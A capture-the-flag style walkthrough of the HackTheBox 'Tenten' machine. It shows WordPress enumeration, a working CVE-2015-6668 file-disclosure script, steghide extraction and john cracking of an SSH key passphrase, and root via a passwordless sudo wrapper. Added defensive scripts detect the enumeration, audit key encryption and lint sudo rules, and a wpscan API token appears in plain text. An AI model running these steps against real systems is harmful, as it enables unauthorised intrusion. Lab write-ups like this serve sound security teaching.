HTB Penetration: Tenten

Tenten is a medium-difficulty target machine. The knowledge points involve exploiting a WordPress plugin, cracking an SSH key passphrase, logging in over SSH with a private key, sudo privilege escalation, and so on. Interested readers can practice on HackTheBox.

Walkthrough mind map

0x01 Reconnaissance

Port scan

First, run a port scan with nmap:

nmap -Pn -p- -sV -sC -A 10.10.10.10 -oA nmap_Tenten

The scan shows that only ports 22 and 80 are open on the target.

Port 80

Access redirects to tenten.htb, so the domain name must be resolved through the hosts file:

vim /etc/hosts
# configuration
10.10.10.10 tenten.htb

Visiting the page again shows the site below: it runs WordPress and its title is Job Portal.

The site contains only the default Hello world post.

Clicking Job Listing opens the job descriptions; the position currently advertised is penetration tester.

Clicking Apply Now opens a resume form asking for name, email, address and other information:

http://tenten.htb/index.php/jobs/apply/8/

Although there is a file upload point, submitting the resume after uploading a PHP script file produces an error.

Changing the 8 in the application URL to 1 changes the page title from the original Pen Tester to Hello World, so the id is not bound to the current listing:

http://tenten.htb/index.php/jobs/apply/1/

Use curl with grep and cut to filter out the title:

curl -s http://tenten.htb/index.php/jobs/apply/8/ | grep "entry-title" | cut -d ">" -f2 | cut -d "<" -f1

A short loop iterates over the number in the URL:

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://tenten.htb/index.php/jobs/apply/$i/ | grep "entry-title" | cut -d ">" -f2 | cut -d "<" -f1; done

The following titles are obtained:

1: Job Application: Hello world!
2: Job Application: Sample Page
3: Job Application: Auto Draft
5: Job Application: Jobs Listing
6: Job Application: Job Application
7: Job Application: Register
8: Job Application: Pen Tester
10: Job Application: Application
11: Job Application: cube
12: Job Application: Application
13: Job Application: HackerAccessGranted
14: Job Application: Application

Directory scan

WordPress is an open source content management system (CMS) used to build websites, blogs, and applications. It provides a user-friendly interface for creating and managing content, and a large ecosystem of plugins and themes extends its functionality.

Use gobuster to scan the site's directories; the results contain only the common WordPress directories and files:

gobuster dir -u http://tenten.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100 --no-error

Vulnerability scan

Use wpscan for a WordPress-specific scan; the results show that the theme is twentyseventeen:

wpscan --url http://tenten.htb --api-token Rjr3NLjvRw21PbkmvY6h4EI1uqS5wB9lzCpPiLziH3A -e

The scan finds the plugin Job Manager, which has two vulnerabilities: an IDOR and an XSS.

It also finds the username takis.

0x02 Foothold [takis]

Job Manager plugin

WordPress is one of the most popular website building platforms in the world, and its vulnerabilities are usually found in plugins; the only plugin on this site is Job Manager. wpscan reported two vulnerabilities in Job Manager. The XSS has no value in this environment, so the focus is CVE-2015-6668, a CV filename disclosure: uploaded resumes land in the predictable /wp-content/uploads/YYYY/MM/ path under their original name. The modified script is as follows:

Script address: https://github.com/k4u5h41/CVE-2015-6668

import requests

print("""
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
""")
website = input('Enter a vulnerable website: ')
#filename = input('Enter a file name: ')

# Titles collected earlier by walking the ids in /index.php/jobs/apply/<id>/
filenames = ["Hello world!","Sample Page","Auto Draft","Jobs Listing","Job Application","Register","Pen Tester","Application","cube","HackerAccessGranted"]

for filename in filenames:
    # WordPress replaces spaces in uploaded file names with hyphens
    filename2 = filename.replace(" ", "-")
    # Uploads are stored under /wp-content/uploads/<year>/<month>/
    for year in range(2013, 2018):
        for i in range(1, 13):
            for extension in ('jpg', 'jpeg', 'docx'):
                URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
                req = requests.get(URL)
                if req.status_code == 200:
                    print("[+] URL of CV found! " + URL)

The script finds the address below. Opening it shows an image, which likely carries hidden data (steganography):

http://tenten.htb/wp-content/uploads/2017/04/HackerAccessGranted.jpg
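Both enumeration steps above leave a distinctive trace in the web server's access log: one client walking consecutive /jobs/apply/ ids, and the same client collecting many 404s under /wp-content/uploads/YYYY/MM/ while guessing file names. The detector below is an added example written for this writeup, not part of the original post or of any WordPress or Job Manager code. It parses Apache/nginx combined-format lines and flags clients that exceed either threshold; the log lines, the client addresses and the thresholds are constructed for the demonstration.

```python
import re
from collections import defaultdict

# Combined log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) '
)
# Job Manager application page with a numeric id (the IDOR endpoint on this site).
APPLY_RE = re.compile(r'^/index\.php/jobs/apply/(?P<id>\d+)/?$')
# Direct file requests into the dated WordPress upload tree.
UPLOAD_RE = re.compile(r'^/wp-content/uploads/\d{4}/\d{2}/[^/]+$')


def parse_line(line):
    """Return a dict with ip/ts/method/path/status, or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, id_threshold=10, probe_threshold=20):
    """Map client ip -> list of findings for id walking and upload-path probing."""
    apply_ids = defaultdict(set)   # ip -> distinct application ids requested
    upload_404 = defaultdict(int)  # ip -> 404 responses under the uploads tree
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = APPLY_RE.match(rec["path"])
        if m:
            apply_ids[rec["ip"]].add(int(m.group("id")))
        elif UPLOAD_RE.match(rec["path"]) and rec["status"] == 404:
            upload_404[rec["ip"]] += 1

    findings = defaultdict(list)
    for ip, ids in apply_ids.items():
        if len(ids) >= id_threshold:
            findings[ip].append(
                f"walked {len(ids)} distinct /jobs/apply/ ids ({min(ids)}..{max(ids)})")
    for ip, n in upload_404.items():
        if n >= probe_threshold:
            findings[ip].append(f"{n} 404s probing /wp-content/uploads/YYYY/MM/ paths")
    return dict(findings)


# Constructed sample log: one scanner (10.10.14.5) and one ordinary visitor (10.10.14.9).
SAMPLE_LOG = []
for i in range(1, 26):  # the id walk, 25 requests
    SAMPLE_LOG.append(
        f'10.10.14.5 - - [23/Dec/2022:13:42:{i:02d} +0530] '
        f'"GET /index.php/jobs/apply/{i}/ HTTP/1.1" 200 5120 "-" "curl/7.88.1"')
for year in (2016, 2017):  # the file-name guessing, 24 requests, one hit
    for month in range(1, 13):
        status = 200 if (year, month) == (2017, 4) else 404
        SAMPLE_LOG.append(
            f'10.10.14.5 - - [23/Dec/2022:13:43:00 +0530] '
            f'"GET /wp-content/uploads/{year}/{month:02d}/HackerAccessGranted.jpg HTTP/1.1" '
            f'{status} 120 "-" "python-requests/2.28"')
SAMPLE_LOG.append(
    '10.10.14.9 - - [23/Dec/2022:13:44:00 +0530] '
    '"GET /index.php/jobs/apply/8/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
SAMPLE_LOG.append(
    '10.10.14.9 - - [23/Dec/2022:13:44:01 +0530] '
    '"GET /wp-content/uploads/2017/04/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"')

if __name__ == "__main__":
    for ip, notes in detect(SAMPLE_LOG).items():
        for note in notes:
            print(f"{ip}: {note}")
```

The thresholds are deliberately low for the sample; on a real job board, tune them against a baseline of how many distinct listings a normal visitor opens per session. Only 404s are counted for the upload tree, because successful downloads of known attachments are normal traffic.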

SSH key passphrase cracking

Use steghide on the image; it extracts a file named id_rsa:

steghide extract -sf HackerAccessGranted.jpg

id_rsa is the conventional file name for an SSH private key:

cat id_rsa

The key is passphrase protected. Convert it into a hash with ssh2john, saving the output as id_rsa.john so that john can crack it:

python /usr/share/john/ssh2john.py id_rsa > id_rsa.john

Run john against the hash with the rockyou wordlist; it recovers the passphrase superpassword:

john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt
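The passphrase fell quickly for two reasons: it was in a common wordlist, and the way OpenSSH-compatible keys are encrypted differs a lot in cost. Legacy PEM keys (the `-----BEGIN RSA PRIVATE KEY-----` form with `Proc-Type: 4,ENCRYPTED`) derive the cipher key from the passphrase with a single MD5 pass, while the newer `openssh-key-v1` format uses bcrypt with a configurable round count (the `-a` option of ssh-keygen, whose documented default is 16). The page does not show the contents of this particular id_rsa, so the audit script below is an added example, not part of the original post or of OpenSSH: it reads either format and reports whether the key is encrypted and how strongly. The two sample keys are constructed in place and contain no real key material; the parser only reads the framing and the KDF fields, which is all that is needed for the verdict.

```python
import base64
import struct


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 length + bytes) at offset."""
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def audit_private_key(text):
    """Report format, encryption and KDF strength of a PEM-framed SSH private key."""
    lines = [l.strip() for l in text.strip().splitlines() if l.strip()]
    if not lines or not lines[0].startswith("-----BEGIN") or not lines[-1].startswith("-----END"):
        raise ValueError("not a PEM-framed key")
    header, body = lines[0], lines[1:-1]

    if "OPENSSH PRIVATE KEY" in header:
        blob = base64.b64decode("".join(body))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(magic)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o2 = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o2)
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "kdf_rounds": rounds}

    # Legacy PEM: encryption is announced by RFC 1421 headers before the base64 body.
    hdrs = dict(l.split(":", 1) for l in body if ":" in l)
    hdrs = {k.strip(): v.strip() for k, v in hdrs.items()}
    encrypted = hdrs.get("Proc-Type", "").endswith("ENCRYPTED")
    cipher = hdrs.get("DEK-Info", "none").split(",")[0]
    # OpenSSL derives the PEM cipher key with EVP_BytesToKey: MD5, one iteration.
    return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "EVP_BytesToKey-MD5" if encrypted else None,
            "kdf_rounds": 1 if encrypted else None}


def weaknesses(text, min_rounds=16):
    """Human-readable findings for a key; empty list means nothing to flag."""
    r = audit_private_key(text)
    out = []
    if not r["encrypted"]:
        out.append("private key is not passphrase protected")
    elif r["format"] == "pem":
        out.append("legacy PEM encryption: key derived with a single MD5 pass, fast to crack offline")
    elif r["kdf"] == "bcrypt" and r["kdf_rounds"] < min_rounds:
        out.append(f"bcrypt rounds {r['kdf_rounds']} below {min_rounds}")
    return out


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def build_openssh_blob(cipher, kdf, rounds):
    """Construct a structurally valid openssh-key-v1 header for testing (placeholder key data)."""
    kdfopts = b"" if kdf == "none" else _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
            + _ssh_string(kdfopts) + struct.pack(">I", 1)
            + _ssh_string(b"placeholder-public") + _ssh_string(b"placeholder-private"))
    b64 = base64.b64encode(blob).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{wrapped}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy PEM sample: real headers, placeholder body (not a usable key).
PEM_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

Q0xFQVJMWS1OT1QtQS1SRUFMLUtFWS1KVVNULVNUUlVDVFVSRQ==
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, key in [("legacy pem", PEM_ENCRYPTED),
                      ("openssh bcrypt 100", build_openssh_blob("aes256-ctr", "bcrypt", 100)),
                      ("openssh no passphrase", build_openssh_blob("none", "none", 0))]:
        print(name, audit_private_key(key), weaknesses(key))
```

Run this over the keys in users' ~/.ssh directories (or over any key found in an unexpected place, as here) to find keys that an offline wordlist attack would recover in minutes; regenerating such keys with the current ssh-keygen format and a strong passphrase removes the finding.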

SSH private key login

Use the private key to log in over SSH. First restrict its permissions to 400, since ssh refuses a key file that other users can read:

chmod 400 id_rsa

Log in as takis with the private key, entering the recovered passphrase when prompted:

ssh -i id_rsa takis@10.10.10.10

The first flag is in the user's home directory:

cat user.txt

0x03 Privilege escalation [root]

Information gathering

Check the current user's sudo rights. The output shows that takis may run any command as the superuser through sudo, but only after entering the user's password; /bin/fuckin alone may be run with sudo without a password:

sudo -l

Look at /bin/fuckin: it is a Bash script that takes four input parameters:

cat /bin/fuckin

Try running fuckin:

/bin/fuckin echo mac
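The weakness here is not sudo itself but the combination of a NOPASSWD rule with a wrapper script that runs whatever it is given, which makes the rule equivalent to NOPASSWD ALL. The lint below is an added example for this writeup, not code from the original post or from the sudo project. It parses the rule lines printed by `sudo -l`, and for each NOPASSWD command that is a script checks whether the script body runs its positional parameters as a command. The `sudo -l` output and the script contents used here are constructed; the page does not reproduce the real /bin/fuckin, so its sample body is an assumption written to match the page's description (a Bash script that runs its four parameters).

```python
import re

# One rule line from `sudo -l`: "(runas) [TAG: ...] command[, command...]".
RULE_RE = re.compile(r'^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')
# A positional parameter ($1..$9, $@, $*) in command position: start of line,
# after ; & |, or as the argument of exec/eval.
ARG_EXEC_RE = re.compile(r'(^|[;&|]\s*|\bexec\s+|\beval\s+)\s*"?\$\{?[1-9@*]', re.M)
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/bash", "/usr/bin/sh"}


def parse_sudo_l(lines):
    """Extract rules from `sudo -l` output; header and Defaults lines are skipped."""
    rules = []
    for line in lines:
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd,
                "path": cmd.split()[0],
            })
    return rules


def lint(rules, file_contents):
    """Findings for rules that grant more than they appear to.

    file_contents maps a command path to its text when it is a script
    (constructed here; on a live host read the files from disk).
    """
    findings = []
    for r in rules:
        who = r["runas"]
        if r["path"] == "ALL":
            if r["nopasswd"]:
                findings.append(f"({who}) NOPASSWD ALL: unrestricted, no password")
            continue  # password-gated ALL is a policy question, not a lint finding
        if not r["nopasswd"]:
            continue
        if r["path"] in SHELLS:
            findings.append(f"({who}) NOPASSWD {r['path']}: shell runs without a password")
            continue
        body = file_contents.get(r["path"])
        if body and ARG_EXEC_RE.search(body):
            findings.append(
                f"({who}) NOPASSWD {r['path']}: script executes its positional "
                f"parameters, equivalent to NOPASSWD ALL")
    return findings


# Constructed `sudo -l` output modelled on the page's description.
SAMPLE_SUDO_L = [
    "Matching Defaults entries for takis on this host:",
    "    env_reset, mail_badpass",
    "",
    "User takis may run the following commands on this host:",
    "    (ALL : ALL) ALL",
    "    (ALL) NOPASSWD: /bin/fuckin",
    "    (root) NOPASSWD: /usr/bin/systemctl restart nginx",
]

# Constructed script bodies; /usr/bin/systemctl is a compiled binary, so it has none.
SAMPLE_FILES = {
    "/bin/fuckin": "#!/bin/bash\n$1 $2 $3 $4\n",  # assumption: wrapper that runs its arguments
}

if __name__ == "__main__":
    for f in lint(parse_sudo_l(SAMPLE_SUDO_L), SAMPLE_FILES):
        print(f)
```

The positional-parameter check is a heuristic: it catches `$1 ...`, `exec "$@"` and `eval "$*"` but not indirect patterns such as sourcing a file named by an argument, so treat a clean result as a prompt for manual review rather than a clearance. The third sample rule shows the intended use of NOPASSWD: a fixed binary with fixed arguments.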

sudo privilege escalation

Since sudo runs fuckin without a password, passing it the command id shows that the command executes as root:

sudo /bin/fuckin id

Spawn a root shell the same way:

sudo /bin/fuckin /bin/bash

The second flag is in /root:

cat /root/root.txt

0x04 Summary

Tenten translates as "two tens", possibly taken from the "twenty" in the WordPress theme twentyseventeen. Information gathering shows that the target site runs WordPress, and a quick look at the site shows that its main function is job postings. wpscan finds the username takis and the WordPress plugin Job Manager, which has two vulnerabilities, an XSS and an IDOR. Enumerating resumes through the IDOR eventually yields an image that carries hidden data.

Analysing the image with steghide yields the SSH private key id_rsa. Since the key is passphrase protected and cannot be used directly, ssh2john converts it into a crackable hash and john recovers the plaintext passphrase. With this passphrase the SSH private-key login succeeds and user access is obtained. Checking the user's sudo rights on the server shows that /bin/fuckin can be run through sudo without a password, so sudo with /bin/fuckin escalates to root.

Tags: bash ssh wordpress

Posted by nolos on Fri, 23 Dec 2022 13:42:08 +0530